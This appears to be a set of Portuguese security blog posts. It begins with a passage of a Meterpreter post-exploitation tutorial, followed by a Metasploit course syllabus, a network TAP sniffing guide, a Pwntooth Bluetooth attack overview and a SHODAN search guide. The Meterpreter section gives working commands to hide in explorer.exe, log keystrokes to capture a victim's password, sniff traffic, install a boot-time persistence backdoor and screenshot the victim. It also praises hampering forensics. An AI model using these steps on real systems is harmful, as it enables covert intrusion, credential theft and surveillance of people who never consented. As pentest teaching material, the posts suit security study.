O meterpreter supera as limitações e fornece várias APIs que permite ao atacante executar diversos ataques de exploração no Shell meterpreter, podendo ir mais a fundo e descobrindo o máximo possível de informações do alvo e da rede interna. Meterpreter proporciona uma enorme flexibilidade para o processo de pós-exploração, deixando-o até escrever seus próprios scripts meterpreter.

Bom, chega de bla bla bla!!!

Como estamos executando em cima do processo “cliqueaqui2.exe”, precisamos migrar para um processo mais estável, onde um usuário dificilmente irá ver onde estamos!

Agora vejamos no console meterpreter o processo que estamos com o comando getpid, seguido do comando ps.

Agora vamos migrar para o processo explorer.exe com o comando migrate. Repare na imagem acima o PID do processo explorer.exe.

Ok! Deseja ver a versão do Windows que você está atacando?
Simples, dê o comando sysinfo.

Agora vejamos o IP da máquina que estamos executando com o comando ipconfig.

Comandos simples até agora, se quiser ver os comandos disponíveis para uso no console meterpreter, basta executar o comando help ou simplesmente ?.

Avançando com Meterpreter.

Agora vamos usar o keylogging¹⁰ e vamos tentar capturar o máximo das teclas digitadas pelo usuário. Está é uma técnica demorada para retorno de informações e consome muito tempo, eu aconselho usa-lá após ter retirado o máximo de informações do alvo e também depois da instalação de algum backdoor¹¹, para que assim, caso o usuário desligue ou reinice a máquina, consigamos voltar a acessá-la posteriormente.
Com o comando keyscan_start, iniciamos o nosso keylogger, agora só esperar um tempo e ver os resultados.

Na imagem abaixo estou tentado fazer login nos serviços do Google.

Agora vamos ver o que nosso keylogger pegou com o comando keyscan_dump e logo em seguida finalizo o mesmo.

Repare na imagem acima, que foi capturado o meu e-mail (meulogin) e minha senha (minhasenha).

Sniffing com Meterpreter.

Vamos sniffar o que passa pela nossa interface do alvo e ver o que conseguimos pegar de interessante.
Primeiramente, precisamos carregar o módulo sniffer¹² com o comando use sniffer, em seguida, pedimos para listar as interfaces de rede com o comando sniffer_interfaces. Iremos iniciar nosso sniffer nesta interface indicada pelo numero 1, com o comando sniffer_start 1, podemos esperar o tempo que você achar conveniente. Já foi tomar uma água? Uma cerveja? Tomou banho? Não? Ok! Não faz mal, vou salvar o que ele farejou até agora em um arquivo com extensão .cap, com o nome de sniffer, com o comando sniffer_dump 1 /tmp/sniffer.cap, para eu poder analisá-lo com outra ferramenta mais intuitiva, e logo após, encerro o sniffing.

Vejamos algumas informações sobre o arquivo sniffer.cap usando o capinfos.

Vamos analisar o arquivo sniffer.cap com a ferramenta Wireshark¹³.
Basta abrir o Wireshark e ir em File > Open e apontar para o arquivo sniffer.cap.

Agora veja a interface do Wireshark já com o arquivo sniffer.cap carregado. E as senhas em plaint-text heim? Perigooo!!! :

Ah! Você não gosta do Wireshark ou não quer usá-lo agora? Prefere o tcpdump?
No problem! Vamos analisar o arquivo sniffer.cap com o tcpdump¹⁴ então, oras!!!

root@bt:~# tcpdump –n –r sniffer.cap

Se quiser ver as primeiras 10 linhas do arquivo, basta adicionar head –n 10 na frente do comando acima.

root@bt:~# tcpdump –n –r sniffer.cap head –n 10

Vamos continuar com o sniffer, só que agora executando com o modo interativo do ruby¹⁵, basta executar o comando irb e voilà!!

Seria interessante, para uma melhor compreensão, ter noções básicas da linguagem ruby.
Como o modo interativo está “doido” para trabalhar, vamos lá.
Um pouco acima, quando executamos o comando use sniffer, por trás dos panos (ou cortinas!), estava executando a seguinte chamada API, client.core.use(“sniffer”) e quando executamos o comando sniffer_interfaces, estavamos invocando (Sai capeta!) a chamada API, client.sniffer.interfaces().
Veja e compare as saídas abaixo.

Olhe a imagem acima e repare que ao passar para o irb a chamada client.core.use(“sniffer”), ele nos retorna true, nos confirmando que foi carregado com êxito. E quando passamos a chamada client.sniffer.interfaces(), nos retorna informações sobre a nossa interface, repare as saídas de ambas as saídas.

E a chamada para iniciarmos o sniffing? Cadê? Calma, está aqui! A chamada API é client.sniffer.capture_start(intf, maxp), vemos que a chamada aceita dois valores, intf é a identificação da interface, repare na imagem acima que conseguimos saber este valor executando a chamada client.sniffer.interfaces(), onde pegamos o valor de “idx”. E o valor de maxp, é a quantidade máxima de pacotes que iremos armazenar no buffer. Ambos deverão ser valores inteiros. Logo em seguida com a chamada client.sniffer.capture_stats(1), vemos o quanto já conseguimos snifar até o momento!

Hora de analisar o que farejamos não? Ohh Yes!! Lembra quando executamos o comando sniffer_dump? Pois é, agora vamos executar a sua chamada API que é identificada por client.sniffer.capture_dump(intf), nesta chamada obtemos do buffer as informações e já apagando-a, par ler os dados precisamos invocar o espírito do... Ops! Me empolguei! Como dizia, precisamos da chamada client.sniffer.capture_dump_read(intf,1024*512).

Ok, já vimos como funciona mais ou menos internamente, agora podemos parar nosso sniffing com a chamada client.sniffer.capture_stop(1), passando a identificação do nossa interface, que equivale ao comando sniffer_stop 1.

Poxa! Vamos parar de “cheirar” agora (Isto me lembra um jogador famoso, deixa pra lá!).

Mantendo o Acesso.

Pois bem, até aqui está indo as mil maravilhas certo?
Não! Está indo mais ou menos, e se a pessoa reiniciar ou até mesmo desligar a máquina destino? Bom, vamos querer continuar com acesso a ela, para que posteriormente possamos obter mais informações ainda. Para isso, existe um script meterpreter que nos ajudará fazer o que queremos, seu nome é persistence! Muito prazer senhor Persistence! :P
Para que possamos manter o acesso com a máquina alvo, precisamos executar o seguinte comando no console meterpreter mostrado logo abaixo, este script é super difícil de utilizá-lo!

meterpreter > run persistence –X

Está vendo que dificuldade você terá pra conseguir manter o acesso com a máquina?
Brincadeiras a parte, vamos à explicação!

O comando acima criará um arquivo executável na maquina destino, a opção –X serve para que o arquivo criado seja executado durante o boot da máquina destino, vejam onboot=true. Repare na saída do comando o endereço IP local da máquina do atacante e que ela escutará na porta 4444, que é a padrão, podemos alterar a porta padrão para outra que nos convenha usando a opção –p seguido do número da porta, exemplo, -p 5555.
Veja que foi feito o upload do executável em C:\DOCUME~1\espreto\CONFIG~1\Temp\RVcLLgpYIYS.vbs e foi identificado com o PID 1052, vejam a saída do comando ps, e observem que foi criado com o nome wscript.exe.
E em seguida, foi criado um arquivo autorun na seguinte chave do registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\yjvpnmqbcAXmWU.

Para testarmos, feche a janela do nosso console msf e abra-a novamente, vamos configurar o exploit multi/handler para ficar aguardando pela conexão. Se você estiver utilizando uma máquina real ou virtual como alvo, desligue-a.

Conforme a imagem acima, agora ligue a máquina que estávamos atacando e espere alguns instantes para que possamos ganhar nossa Shell meterpreter.

Ok! Temos nossa Shell novamente e podemos continuar nossa exploração.

PrintScreen

Outro recurso legal que o meterpreter nos oferece, é a possibilidade de tirarmos um printscreen da máquina destino, assim podemos ver o que a nossa vítima está fazendo naquele momento, não tão interessante, mais dá pra dar umas boas risadas!

Este é outro script extremamente difícil de usar. Reparem logo abaixo. :P

Usamos o comando use espia, para carregar o módulo meterpreter e em seguida executamos o comando screenshot seguido pelo caminho onde será salvo nosso screenshot com o nome de print1.png. Viram a dificuldade? Hehehe! Vejam a saída da imagem abaixo!

Conclusão

Como havia mencionado, o meterpreter oferece uma enorme flexibilidade para a pós-exploração, aqui neste artigo, escrevi algumas de suas particularidades. Poderia escrever um livro enorme sobre todas as possibilidades de uso para o framework! (Quem sabe!)

De posse da Shell meterpreter existe diversos recursos que podemos utilizar para explorar ainda mais todos os recursos da rede, como, explorar outros computadores da rede a partir deste que estamos, habilitar o recurso de RDP (Remote Desktop Protocol), instalação de backdoors mais sofisticados, capturar hashs, dificultar o trabalho de perícia forense (Show!), entre várias outras possibilidades.

Caso apareçam dúvidas (Óbvio) referentes a este artigo, peço que, se possível, me enviem um e-mail para robertoespreto@gmail.com, pois vejo minha caixa de entrada toda hora. Mandem sugestões também sobre o metasploit que assim que possível escreverei sobre o mesmo.

Obrigado a todos e quem teve paciência de chegar até aqui!
Abraços!!!

3spreto
®

Referências.

1 – Metasploit
http://www.metasploit.com/

2 – Pen Tester
http://en.wikipedia.org/wiki/Penetration_test

3 – Linux
http://www.vivaolinux.com.br/linux/

4 – Redes de Computadores
http://pt.wikipedia.org/wiki/Rede_de_computadores

5 – Introdução ao TCP/IP
http://www.vivaolinux.com.br/artigo/Introducao-ao-Protocolo-Internet-IP

6 – Virtualização
http://www.vivaolinux.com.br/artigo/Virtualizacao-Montando-uma-rede-virtual-para-testes-e-estudos-de-servicos-e-servidores

7 – SVN Metasploit
https://www.metasploit.com/svn/framework3/trunk/

8 – Virus Total
http://www.virustotal.com/pt/

9 – Scan Malware Jotti
http://virusscan.jotti.org/pt-br

10 – Keylogging
http://pt.wikipedia.org/wiki/Keylogger

11 – Backdoor
http://pt.wikipedia.org/wiki/Backdoor

12 – Sniffing
http://pt.wikipedia.org/wiki/Sniffing

13 – Wireshark
http://www.wireshark.org/

14 – TCPDUMP
http://www.tcpdump.org/

15 – Linguagem Ruby
http://www.ruby-lang.org/pt/

16 – Blog Codesec.
http://codesec.blogspot.com/

Tanks!!!

Curso Metasploit Intermediate em Campinas-SP

2010-01-27T20:36:00.031-02:00

Metasploit - Penetration Testing Resources

Metasploit fornece informações úteis e ferramentas para os penetration tester, pesquisadores de segurança e desenvolvedores de assinaturas para IDS. Este projeto foi criado para fornecer informações sobre técnicas de exploração e criar uma base de conhecimento funcional para os desenvolvedores e profissionais de segurança. AS ferramentas e informações contidas neste curso, será pura e exclusivamente para fins de teste e conhecimento.

O curso tem cerca de 90% de pura prática e tem a duração de 8 horas (1 dia inteiro).

Ementa:

Introdução ao Framework Metasploit.
-- Historia do Framework;
-- Time de Desenvolvedores;
-- Tecnologias Utilizadas;
-- Diferentes Interfaces do Framework;
-- Msfweb;
-- Msfcli;
-- Msfgui;
-- Msfconsole; (Utilizado no curso)
-- Instalação em Diferentes SOs;
-- Usando o LiveDVD BackTrack 4;

Conversando com o Metasploit.
-- Comando "help"
-- Comando "show"
-- Comando "search"
-- Comando "info"
-- Comando "use"
-- Comando "connect"
-- Comando "set"
-- Comando "check"
-- Comando "exploit/run"
-- Comando "back"
-- Comando "resource"
-- Comando "irb"
-- Comando "load"
-- Entre outros...

Técnicas de Pré-Exploração
-- Roubando Informações;
-- Framework Dradis;
-- Scanning de Portas;
-- Importando/Exportando resultados;
-- Ferramentas e Módulos Auxiliares;
-- Procurando MSSQL;
-- Identificação de Serviços;
-- Sniffing de senhas;
-- Usando o SNMP;
-- Scanning de Vulnerabilidades (Nessus/OpenVAS);
-- Checando login SMB;
-- Autenticação VNC;
-- WMAP Scanner WEB;
-- Trabalhando com Fuzzers;

Exploração com o Metasploit
-- Explorando uma máquina MS;
-- Explorando uma máquina Linux;
-- Burlando Anti-virus;
-- Explorando IIS, Apache;
-- Dentre outros;

Técnicas de Pós-Exploração com MSF.
-- PSexec;
-- Incognito;
-- Interagindo com o registro;
-- Backdoor com NetCat;
-- Sniffing de Pacotes com Meterpreter;
-- Pivoting;
-- TimeStomp;

O curso oferece:
# Certificado;
# DVD com o BackTrack Personalizado pela equipe do BackTrack Brasil;
# Apostila do Curso;
# Coffe-Break (15 minutos durante a tarde);
# Aulas práticas com as mais recentes vulnerabilidades;
# Após o curso, será disponibilizado os slides e materiais adicionais para os alunos em seus e-mails;

Recursos da Sala de Aula:
# Ar-Condicionado;
# Datashow;
# 1 Computador por pessoa;
# 2 Professores presentes no Curso (Equipe do BackTrack Brasil);

O curso "Metasploit Intermediate", será realizado na data 06 de março de 2010, tendo iníco as 8h e término as 17h do mesmo dia.

8h00 até 12h => Curso.
12h até 13h => Almoço (Não incluso).
13h até 15h30min => Curso.
15h30min até 15h50min = Coffe-Break (Incluso).
16h até 17h => Curso.

O valor para a 1ª turma está sendo oferecido a R$480,00, com a forma de pagamento através do PagSeguro ou Depósito em Conta Bancária.
Para os interessados, as inscrições serão realizadas até o dia 25 de fevereiro de 2010. Ainda existem vagas!!!

Local situado na Rua Romualdo Andreazi, 677 - Jardim Trevo em Campinas - SP.
Para maiores informações entrar em contato conosco:

Roberto Soares (3spreto)
espreto@backtrack.com.br
Tel: (19) 9267-0320

Mauro Risonho (Firebits)
firebits@backtrack.com.br
Tel: (19) 9698-2139

Ou nos enviem um e-mail com seu número de telefone para podermos entrar em contato com você.

Segue algumas fotos do local onde será realizado o treinamento.

Vai farejar aqui? (TAP na cara dele!)

2009-12-16T12:59:00.022-02:00

Apesar do título, não haverá nenhuma apologia a violência aqui galera, lhes garanto. :)
Demonstrarei como criar um dispositivo simples para analisar/monitorar o tráfego de rede em nosso pequenino exemplo, conhecido como Network TAP, ou simplesmente, TAP. Já existem soluções profissionais para este fim. Aqui vamos criar algo rústico, que não deverá ser usado em um ambiente de produção, pois poderá perder o desempenho da sua rede, perca de pacotes, etc... Seria interessante para quem quiser estudar sobre sniffers, sistemas IDS e outras técnicas de ataques.

O que é sniffing?

Sniffing é um procedimento realizado por uma ferramenta conhecida como sniffer, que é capaz de interceptar e registrar o tráfego de dados em uma redes de computadores. O sniffing pode ser utilizado para fins maliciosos que poderiam tentar capturar o tráfego da rede com diversos objetivos, por exemplo, obter cópias de arquivos enquanto sua transmissão, obter senhas, ver as conversações em tempo real, etc...

Chega de blá blá blá.

TAP

Cenário Utilizado.

Criei este ambiente apenas para fins didáticos, cabe a sua imaginação e conhecimento adequar para o necessário. Segue alguns itens utilizados:

> Conexão Banda Larga;
> TAP;
> Micro1 com 2 Placas de Rede;
> Switch;
> Micro2 com Windows 7;

Montado o TAP:

Utilizei 4 conectores fêmeas RJ-45 e pequenos pedaços de cabo cat-5e.
Segue o esquema para a confecção do mesmo:

FOTOS DO TAP:

Dependendo da sua criatividade, dá pra deixar mais elegante este dispositivo, mais a princípio, não vem ao caso.
Pronto, acabamos o TAP.

Qualquer dúvida em relação à criação do TAP, entrar em contato pelo meu e-mail que ajudarei com o mesmo.

Utilizamos aqui 2 placas de rede, um para cada sentido do tráfego.
Vamos agora configurar as interfaces de rede eth0 e eth1 para que elas se tornem uma única interface lógica, chamaremos a nova interface de bond0. Usaremos um recurso do Linux que se chama Bonding, para criar a tal interface.

Obs.: Precisamos ter instalado na máquina o pacote ifenslave, para isso basta:

# apt-get install ifenslave

Vamos agora configurar as 2 interfaces.

# modprobe bonding
# ip addr add 192.168.0.254/24 brd + dev bond0
# ifconfig eth0 promisc -arp up
# ifconfig eth1 promisc -arp up
# ifconfig bond0 promisc -arp up
# ifenslave bond0 eth0
# ifenslave bond0 eth1
# ifconfig

Veja que aparece uma nova interface (bond0).
Ok, interfaces configuradas.

A hora do TCPDUMP:

O tcpdump é um sniffer muito conhecido e utilizado pelos profissionais de TI em suas diversas áreas. Tcpdump mostra uma descrição do conteúdo dos pacotes em uma interface de rede em tempo real. Vejamos mais de perto como funciona:
Estando no micro com o BackTrack, basta abrir um terminal e digitar o comando:

# tcpdump –i bond0 –vv

-i para especificar a interface
bond0 é a interface lógica que criamos
-vv de verbose, para mostrar tudo na tela conforme for capturando o tráfego.

Assim, ele vai capturando tudo o que passar pela interface específicada (bond0) e apresentar os resultados na tela. Quanta imaginação dá pra usar agora heim!!!
Poderá também, salvar o log gerado pelo tcpdump em um arquivo e depois analisá-lo com algum programa de interface mais amigável, como por exemplo, o Wireshark.

Alguns comentários extras:

Existe a possibilidade de construir o TAP utilizando apenas uma interface de TAP, ou seja, ao invés de usarmos 4 conectores, usamos apenas 3, fica para um possível estudo ou caso queiram poderei criar um novo tutorial passo-a-passo e postar.
Não entrei em muitos detalhes, sei que em algumas partes o conteúdo está vago, então por isso, espero as perguntas.
Em uma continuação futura, mostrarei algumas técnicas de sniffing utilizando nosso TAP, como captura de tráfego SSL / HTTPS, entre outros.

Obs.: Volto a lembrá-los, este tutorial é para fins didáticos, não é uma solução para sua empresa em produção, etc...

Referências:

NETWORK TAP;
http://en.wikipedia.org/wiki/Network_tap
Sniffing
http://pt.wikipedia.org/wiki/Sniffing
Create a passive network tap for your home network;
http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/
Linux Ethernet Bonding Driver Mini-Howto;
http://www.kernel.org/pub/linux/kernel/people/marcelo/linux-2.4/Documentation/networking/bonding.txt
TCPDUMP;
http://www.tcpdump.org/
Wireshark;
http://www.wireshark.org/

Questions?

---------------------------------------------------
Roberto Soares (3spreto)
robertoespreto@gmail.com
espreto@backtrack.com.br
http://codesec.blogspot.com/
®

Pwntooth - Pen Testing em dispositivos Bluetooth

2009-12-02T01:49:00.013-02:00

Pwntooth (pown-tootn) foi projetado para automatizar o processo de Pen Testing em dispositivos Bluetooth. Ele faz a varredura dos dispositivos e, em seguida, executa as ferramentas específicadas no arquivo pwntooth.conf. Incluindo blueper, bluesnarfer, Bluetooth Stack Smacher (BSS), carwhisperer, psm_scan, rfcomm_scan e vcardblaster.

Detalhes das ferramentas incluídas no Pwntooth:

Blueper: Blueper é uma ferramenta desenhada para a transferência de arquivos via Bluetooth. Esta ferramenta pode causar vários resultados “incômodos”, incluindo; pop-ups, pedidos contínuos de transferência de arquivos, gravação de dados em um disco remoto, ou trancar/quebrar (lógicamente) alguns dispositivos.

Bluesnarfer: Esta ferramenta irá baixar a lista telefônica de qualquer dispositivo móvel vulnerável a bluesnarfing.

Bluetooth Stack Smasher (BSS): É um difusor de camada L2CAP.

Carwhisperer: O projeto carwhisperer pretende alertar os fabricantes de kits Bluetooth e outros aparelhos que utilizam a tecnologia Bluetooth, para a evolução da ameaça à segurança da utilização de chaves de acesso padrão.

Psm_scan: É um port scanner que relata apenas se um canal PSM (Service Protocol Multiplexers) está aberta ou fechada. Além disso, suporta a digitalização usando sockets RAW para recolher um pouco mais de informações sobre o estado do PSM.

Rfcomm_scan: Também é um port scanner, relata apenas se um canal RFCOMM está aberto ou fechado.

Vcardblaster: É uma ferramenta utilizada para abusar do envio de cartões de visita através do Bluetooth. Ele permite enviar ao usuário um fluxo contínuo de vCards para tentar um possível ataque DoS Bluetooth ou deixar os recursos do dispositivo indisponível momentaneamente.

Pwntooth é uma ferramenta totalmente automatizada, tipo “Procurar e destruir”. Indicada para usuários avançados que desejam executar uma série de testes contra cada dispositivo em específico na área. Embora haja algumas linha pré-configuradas no arquivo pwntooth.conf, é preferível que os usuários especifiquem a sua própria configuração, agilizando o processo no seu Pen Test.

Instalação:
Baixe o arquivo pwntooth-0.2.2.tar.gz (Ultima versão até então) e descompacte-o.

Entre no diretório criado e execute os seguintes passos:

# make -> Para compilar os binários.
# make install -> Para instalar no sistema.
# make clean -> Para apagar os binários do diretório pwntooth.

Ferramentas Adicionais:

Entre no diretório “tools” dentro do diretório pwntooth recém criado e repita os 3 passos demonstrados acima.

Sintaxe de Uso:

# pwntooth [-l logfile] [-s script] [-t addr]

Opções:

-h : Ajuda
-l : Arquivo para gerar os resultados de log
-n : Números de scans antes de parar
-s : Localização e nome do script. Padrão: pwntooth.conf
-t : Endereço único do dispositivo alvo. Formato XX:XX:XX:XX:XX:XX

Dicas:
Sugiro que visualizem o conteúdo do arquivo de configuração pwntooth.conf, existe várias opções a serem descomentadas. Caso saiba, poderá incluir suas próprias configurações no arquivo de configuração.

Referência:
http://www.hackfromacave.com/pwntooth.html

Abraços!!!

SHODAN - Computer Search Engine

2009-11-27T00:03:00.012-02:00

Estava eu, em minhas leituras diárias em busca de expansão cerebral, quando li alguns rumores desta nova opção de busca por Servidores Web e etc, por sinal, EXCELENTE! Fica a dica para testarem.

SHODAN permite encontrar servidores/roteadores/etc, usando uma simples caixa de pesquisa, parecida com a caixa de busca do google. A maioria dos dados, no índice, abrange servidores da Web no momento, mas há alguns dados sobre FTP, Telnet e serviços, bem como o SSH. Vamos ver a capacidade do software e o que descobrimos em sua pesquisa.

Vamos dizer que você quer encontrar servidores executando o daemon "Apache". Uma simples tentativa seria usar:

Apache

Assim como abaixo:

Então agora, vamos encontrar apenas os servidores Apache rodando a versão 2.2.3? Não. Ah, fica aí então, eu vou! Let´s go!

Apache 2.2.3

Como mostrado abaixo:

Você também pode diminuir os resultados, ou seja, refinar as buscas, utilizando os parâmetros de pesquisa que segue abaixo:

country: As 2 letras referente ao país. (Não me refiro a dança country! :P)
hostname: Nome total ou parcial do host (hostname).
port: 21, 22, 23 ou 80.

Por exemplo: Obter todos (Disse todos? :| ) os webservers (port: 80) que funcionam o "apache" no Brasil (country: BR):

Apache country:BR port:80

Veja os resultados:

Divirta-se com o SHODAN. Após os resultados, seguir em frente é por sua conta. Fica o alerta aos administradores de redes/sistemas.

Instalando o SHODAN no Firefox:

Segue o link para download.
https://addons.mozilla.org/en-US/firefox/addon/51663

SHODAN conta com uma interface amigável para filtros de pesquisa (país, hostname, etc.), também fornece links úteis para websites relevantes para a investigação de segurança. Após a instalação, vá para: "Ferramentas (Tools) -> Shodan" para ativá-lo.

Referências:

Site do Projeto:
http://shodan.surtri.com/

Abraços.